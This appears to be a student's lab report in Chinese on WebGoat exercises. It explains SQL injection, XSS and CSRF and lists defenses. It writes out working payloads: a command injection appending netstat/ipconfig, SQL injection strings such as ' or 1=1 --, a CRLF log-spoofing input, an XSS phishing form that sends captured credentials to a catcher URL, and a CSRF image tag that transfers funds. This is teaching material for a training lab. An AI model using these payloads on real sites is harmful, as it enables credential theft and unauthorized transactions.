20165218 《网络对抗技术》 Exp9 网络安全基础

Exp9 网络完全基础

基础问题回答

SQL注入攻击原理，如何防御

所谓SQL注入，就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。

sql注入攻击是利用是指利用设计上的漏洞，在目标服务器上运行Sql语句以及进行其他方式的攻击，动态生成Sql语句时没有对用户输入的数据进行验证是Sql注入攻击得逞的主要原因。

比如登录过程，SQL语句一般为："select id from users where username = '"+username +"' and password = '" + password +"'"，这里的username和password都是我们存取从web表单获得的数据。如果我们在表单中username的输入框中输入' or 1=1--。此时我们所要执行的sql语句就变成了select id from users where username = '' or 1=1-- and password = ''。因为1=1是true，后面 and password = ''被注释掉了。所以这里完全跳过了sql验证。

以上是最经典的一种情况。但在本次实验中，还涉及到了网页对输入字符长度的限制等等，需要修改相应的代码。

由此可见，对SQL注入攻击的防御，主要有：

关闭或删除不必要的交互式提交表单页面；
对漏洞注入点相关代码进行代码及SQL注入关键字的过滤，以规范代码安全性；
不要在服务器端放置备份的文件以免受到感染，或备份的文件含有漏洞，造成切入点。

一、XSS攻击的原理与防御

攻击者利用网站漏洞（通常这些漏洞是指网站后台处理程序没有很好的对用户输入进行过滤），输入可以显示在页面上的、对其他用户造成影响的HTML代码；由于受害者浏览器对目标服务器的信任，当其访问目标服务器上被注入恶意脚本的页面后，这段恶意脚本可以顺利执行，实现获取用户cookie并可以利用用户身份进行非法操作的目的。

浏览器自身可以识别简单的XSS攻击字符串，从而阻止简单的XSS攻击；从根本上说，解决办法是消除网站的XSS漏洞，这就需要网站开发者运用转义安全字符等手段。

CSRF的攻击原理与防御

CSRF 的全称是“跨站请求伪造”，而 XSS 的全称是“跨站脚本”。看起来有点相似，它们都是属于跨站攻击——不攻击服务器端而攻击正常访问网站的用户。CSRF 顾名思义，是伪造请求，冒充用户在站内的正常操作。我们知道，绝大多数网站是通过 cookie 等方式辨识用户身份（包括使用服务器端 Session 的网站，因为 Session ID 也是大多保存在 cookie 里面的），再予以授权的。所以要伪造用户的正常操作，最好的方法是通过 XSS 或链接欺骗等途径，让用户在本机（即拥有身份 cookie 的浏览器端）发起用户所不知道的请求。

严格意义上来说，CSRF 不能分类为注入攻击，因为 CSRF 的实现途径远远不止 XSS 注入这一条。通过 XSS 来实现 CSRF 易如反掌，但对于设计不佳的网站，一条正常的链接都能造成 CSRF。

防御的方法可从以下几个角度考虑：

改良站内 API 的设计。对于发布帖子这一类创建资源的操作，应该只接受 POST 请求，而 GET 请求应该只浏览而不改变服务器端资源。
使用“请求令牌”。首先服务器端要以某种策略生成随机字符串，作为令牌（token），保存在Session里。然后在发出请求的页面，把该令牌以隐藏域一类的形式，与其他信息一并发出。在接收请求的页面，把接收到的信息中的令牌与Session中的令牌比较，只有一致的时候才处理请求，否则返回 HTTP 403 拒绝请求或者要求用户重新登陆验证身份

实践过程记录

SQL注入攻击

Command Injection 命令注入攻击

命令注入漏洞允许未经授权的执行操作系统命令。由于命令注入漏洞的存在，应用程序无法正确地验证和消毒，使用时会调用shell的功能。攻击者往往会通过控制这些参数达到欺骗应用程序执行任何系统命令的目的。
原理：在正常的参数提交过程中添加恶意代码以执行某条指令。

左边黑色边栏选择Command Injection，在网页上右击选择inspect Element审查网页元素并对源代码进行修改
找到复选框表单，在其中任意一览(这里是BackDoors.help)后面添加"& netstat -an &ipconfig
点击View，看到执行命令后的网络端口使用情况和IP地址

Numberic SQL Injection数字型注入

注入数字型数据（如：永真式）达到注入的效果。

左边栏选择 Numberic SQL Injection，打开审查网页元素，在选中的城市编号Value值中添加or 1=1
[003]
能够显示所有城市的天气情况

Log Spoofing 日志欺骗攻击

通过在日志文件中插入脚本实现欺骗。在日志文件中愚弄人的眼睛，攻击者可以利用这种方式清除他们在日志中的痕迹。

选择Log Spoofing
在username一栏中填入5218%0d%0aLogin Succeeded for username: admin，利用回车(0D%)和换行符号(%0A)让其在日志中显示

LAB:SQL Injection SQL注入

选择LAB:SQL Injection，打开审查网页元素，对源代码进行修改
将password密码框最大长度限制调整为30
任选登录用户(这里为默认的Larry Stooge)，输入密码' or 1=1 --，登陆成功

XXS攻击

Phinshing with XSS 跨站脚本钓鱼攻击

跨站脚本攻击是通过HTML注入劫持用户的浏览器，任意构造用户当前浏览的HTML内容，可以模拟用户当前的操作。这里实验的是一种获取用户名和密码的攻击.

打开左边栏的Cross-Site Scripting （xss）——Phishing with XSS
在Search中输入以下代码，回车

<head>
<body>
<div>
<div style="float:left;height:100px;width:50%;background-color:green;"></div>
<div style="float:left;height:100px;width:50%;background-color:red;"></div>
</div>
<div style="background-color:blue;height:200px;clear:both;"></div>
 
</div></div>
</form>
  <script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("attack.！！！！！！ Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} 
  </script>
<form name="phish">
<br>
<br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
</head>

结果中出现代码中所指定的绿、红、蓝三块div，并在下方出现了用于欺骗用户的提示语“This feature requires account login:”和用户名、密码输入框。
在登录框中输入用户名、密码并点击登录，会像代码中alert提示的，显示被窃取的用户名和密码。

CSRF 跨站请求伪造攻击

打开Cross-Site Scripting(xxs)——Cross Site Request Forgery(CSRF)
查看页面右边Parameters内的是scr和menu分别为497,900
在Title内输入任意参数，Message内输入<img src="http://localhost:8080/WebGoat/attack?Screen=497&menu=900&transferFunds=5000" width="1" height="1" />
提交后，在Message List中生成以Title命名的链接（消息）。点击该消息，当前页面就会下载这个消息并显示出来，转走用户的5000元，从而达到CSRF攻击的目的。